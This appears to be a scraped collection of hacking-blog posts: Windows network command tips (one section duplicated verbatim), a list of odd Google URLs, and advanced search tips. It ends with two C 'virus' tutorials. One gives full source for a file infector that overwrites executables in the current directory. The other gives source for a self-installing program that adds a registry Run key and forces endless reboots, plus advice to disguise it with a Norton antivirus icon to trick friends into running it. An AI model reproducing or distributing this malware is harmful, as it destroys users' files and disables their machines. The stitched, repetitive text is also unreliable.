9. Now click on Save option (File->Save). Resource Hacker will automatically create a backup file called explorer_original.exe so that you can restore it in the future if needed.

10. Log Off and Log On to see the changes in effect.

NOTE: If you are running 64-bit edition of Windows 7, then you need to use Resource Hacker version 3.5.2 beta which is 64-bit compatible. It is available from the same link provided above.

I hope you enjoy this trick. Pass your comments and share your experience.

Windows IP Utilities hack

The following are the IP utilities available in Windows that help in finding out the information about IP Hosts and domains. These are the basic IP Hacking Commands that everyone must know!

Please note that the the term Host used in this article can also be assumed as a Website for simple understanding purpose.

1. PING

PING is a simple application (command) used to determine whether a host is online and available. PING command sends one or more ICMP Echo messages to a specified host requesting a reply. The receiver (Target Host) responds to this ICMP Echo message and returns it back to the sender. This confirms that the Host is online and available. Otherwise the host is said to be unavailable.

Syntax:
C:\>ping gohacking.com

2. TELNET

Telnet command is used to connect to a desired host on a specified port number. For example

Syntax:
C:\>telnet yahoo.com 25
C:\>telnet yahoo.com
NOTE: The default port number is 23. When the port number is not specified the default number is assumed.

Telnet Hacking is explained in detail in the following post.
How To Send Fake Email

3. NSLOOKUP

Many times we think about finding out the IP address of a given site. Say for example google.com, yahoo.com, microsoft.com etc. But how to do this? For this there are some websites that can be used to find out the IP address of a given site. But in Windows we have an inbuilt tool to do this job for us. It is nslookup. Yes this tool can be used for resolving a given domain name into it’s IP address (determine the IP of a given site name). Not only this it can also be used for reverse IP lookup. That is if the IP address is given it determines the corresponding domain name for that IP address.

Syntax:
C:\>nslookup google.com

4. NETSTAT

The netstat command can be used to display the current TCP/IP network connections. For example the following netstat command displays all connections and their corresponding listening port numbers.

Eg: C:\>netstat -a

This command can be used to determine the IP address/Host names of all the applications connected to your computer. If a hacker is connected to your system even the hacker’s IP is displayed. So the netstat command can be used to get an idea of all the active connections to a given system.

Windows IP Utilities hack

The following are the IP utilities available in Windows that help in finding out the information about IP Hosts and domains. These are the basic IP Hacking Commands that everyone must know!

Please note that the the term Host used in this article can also be assumed as a Website for simple understanding purpose.

1. PING

PING is a simple application (command) used to determine whether a host is online and available. PING command sends one or more ICMP Echo messages to a specified host requesting a reply. The receiver (Target Host) responds to this ICMP Echo message and returns it back to the sender. This confirms that the Host is online and available. Otherwise the host is said to be unavailable.

Syntax:
C:\>ping gohacking.com

2. TELNET

Telnet command is used to connect to a desired host on a specified port number. For example

Syntax:
C:\>telnet yahoo.com 25
C:\>telnet yahoo.com
NOTE: The default port number is 23. When the port number is not specified the default number is assumed.

Telnet Hacking is explained in detail in the following post.
How To Send Fake Email

3. NSLOOKUP

Many times we think about finding out the IP address of a given site. Say for example google.com, yahoo.com, microsoft.com etc. But how to do this? For this there are some websites that can be used to find out the IP address of a given site. But in Windows we have an inbuilt tool to do this job for us. It is nslookup. Yes this tool can be used for resolving a given domain name into it’s IP address (determine the IP of a given site name). Not only this it can also be used for reverse IP lookup. That is if the IP address is given it determines the corresponding domain name for that IP address.

Syntax:
C:\>nslookup google.com

4. NETSTAT

The netstat command can be used to display the current TCP/IP network connections. For example the following netstat command displays all connections and their corresponding listening port numbers.

Eg: C:\>netstat -a

This command can be used to determine the IP address/Host names of all the applications connected to your computer. If a hacker is connected to your system even the hacker’s IP is displayed. So the netstat command can be used to get an idea of all the active connections to a given system.

Inside GoOgLe – A Collection of Strange Links on Google

Although Google is a search engine, it’s also a website. It has millions of it’s own pages indexed in it. When i was digging deep inside Google i found some strange links inside it. So I decided to compile a list of strange Google links. Enjoy!

1. If you ever wondered all the misspellings of Britney Spears and their volume, you must check this out.
http://www.google.com/jobs/britney.html

2. These two links are to fun Google games
http://www.google.com/Easter/feature_easter.html

http://www.google.com/heart/heart01.html

3. Quench your thirst for knowledge with Google Gulp
www.google.com/googlegulp

4. Check out Google’s latest ideas
http://www.google.com/experimental

5. If you are fond of puzzles
http://www.google.com/puzzles

6. Tribute to Moms
http://www.google.com/moms01

7. Google Mobile maps
http://www.google.com/mobile/gmm/index.html

8. http://www.google.com/tofc

9. Are you scary smart?
http://www.google.com/scarysmart

10. Google press center
http://www.google.com/press

11. Google apps
http://www.google.com/a/help/intl/en/var_0.html

12. Mind-racing problems
http://www.google.com/indiacodejam

13. Doodle 4 Google
http://www.google.com/doodle4google

14. The virgle
http://www.google.com/virgle

15. Google Alerts
http://www.google.com/alerts

16. Urchin Software from Google
http://www.google.com/urchin

17. Google dictionary
http://www.google.com/translate_dict

18. Inside google
http://www.google.com/plex

19. Movie reviews
http://www.google.com/reviews

20. Google Mars
htttp://www.google.com/mars

21. Google Sky
http://www.google.com/sky

22. Google’s next Coding Competition site
http://www.google.com/codejam

23.http://www.google.com/pda

24.http://www.google.com/m

25.http://www.google.com/imode

26.http://www.google.com/jsky

27. Blog search
http://www.google.com/blogsearch

28.Microsoft on google
http://www.google.com/microsoft

29. Google Moon
http://www.google.com/moon

30. Google Linux
http://www.google.com/linux

31. http://www.google.com/ie

32. Google tour
http://www.google.com/tour/services

33. Google TOS
http://www.google.com/accounts/TOS

34. Google trends
http://www.google.com/trends/hottrends

35. Google arts
http://www.google.com/Top/Arts

36. Google 3d warehouse
http://www.google.com/sketchup/3dwh

37. Google Adult content
http://www.google.com/Top/Adult

38. Google & Dilbert Doodle
http://www.google.com/dilbert.html

39. Google in Kannada
www.google.com/intl/kn

40. Google strange logos
http://www.google.com/doodle8.html
http://www.google.com/doodle9.html

30.Win Registry files in google
http://www.google.com/google_rsearch.reg

31.Google Universities Search
http://www.google.com/options/universities.html

Oops there’s still lot more.But only this much for now….

google ful knowledge

In this post I will show you some of the secrets of Advanced Google Search.

Google is clearly the best general-purpose search engine on the Web. But most people don’t use it to its best advantage or in an advanced way. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google’s index, it’s still a struggle to pare results to a manageable number. There are some ways in which advanced Google search can be used to get the desired results.

But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Advanced Google search options go beyond simple keywords, the Web, and even its own programmers. Let’s look at some of the advanced Google search options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Here are some advanced Google search operators that can help narrow down your search results.

1. Intitle: at the beginning of a query word or phrase (intitle:”Three Blind Mice”) restricts your search results to just the titles of Web pages.

2. Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you’re searching for might commonly appear in URLs. If you’re looking for the term HTML, for example, and you don’t want to get results such as

www.gohacking.com/index.html

you can enter intext:html

3. Link: lets you see which pages are linking to your Web page or to another page you’re interested in. For example, try typing in

link:http://www.gohacking.com

4. site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:”Mark Twain”site:edu. Experiment with mixing various elements; you’ll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature (Google Calculator) lets you do both math and a variety of conversions from the search box. For extra fun, try the query “Answer to life the universe and everything.”

Suppose you want to contact someone and don’t have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you’ll see it at the top of the search results along with a map link to the address. If you’d rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you’d rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).

Let Google help you figure out whether you’ve got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try “thre blund mise”) and Google may suggest a proper spelling. This doesn’t always succeed; it works best when the word you’re searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you’re searching for “three blind mice,” underneath the search window will appear a statement such as Searched the web for “three blind mice.”) You’ll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Extended Googling

Google offers several advanced services that give you a head start in focusing your search. Google Groups (Google Groups) indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools:

Froogle CODE (FroogleCODE),

which indexes products from online stores, and Google CatalogsCODE(Google Catlogs),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google’s tools and services at www.google.com/options/index.html

You’re probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

http://www.googlealert.com

monitors your search terms and e-mails you information about new additions to Google’s Web index. (Google Alert is not affiliated with Google; it uses Google’s Web services API to perform its searches.) If you’re more interested in news stories than general Web content, check out the beta version of Google News Alerts

www.google.com/newsalerts

This advanced Google service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

Google Labs

a place for experimental Google ideas and features (which may come and go, so what’s there at this writing might not be there when you decide to check it out).

With Google Voice Search (Google Voice Search), you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don’t expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google’s search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you’ll need an API key, which is available free from CODE www.google.com/apis

SOURCE: www.pcmag.com

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include
#include
#include
#include
#include
#include

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE

2. Goto

X:\Windows\System
(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.

LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .